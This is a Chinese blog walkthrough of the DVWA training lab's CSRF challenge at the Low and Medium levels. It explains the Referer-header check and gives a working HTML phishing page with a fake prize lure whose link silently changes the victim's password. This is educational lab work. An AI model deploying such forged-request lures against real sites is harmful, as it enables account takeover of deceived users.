DVWA-CSRF跨站请求伪造 Medium和Low级别

1代码分析

 

过滤条件

if( stripos( $SERVER[ 'HTTP_REFERER' ] ,$SERVER[ 'SERVER_NAME' ]) !== false )

判断,$SERVER[ 'SERVER_NAME' ]在 $SERVER[ 'HTTP_REFERER' ] 中是否存在,寻找第一次出现的地址

$_SERVER[ ' SERVER_NAME' ] 网站的地址 192.168.0.9

$_SERVER[ 'HTTP_REFERER' ] 请求发起着地址 192.168.0.9(靶场地址)若从黑客构造的钓鱼网站跳转的,显示的是黑客攻击机的地址

2正常构造一个CSRF

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>恭喜你,获得100万大奖,点击领取....</title>
</head>
<body>
<a href='http://192.168.0.9/DVWA-master/vulnerabilities/csrf/? 
password_new=123456&password_conf=123456&Change=Change'>点击领取百万大奖</a>
</body>
</html>

WIN10-浏览器访问

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值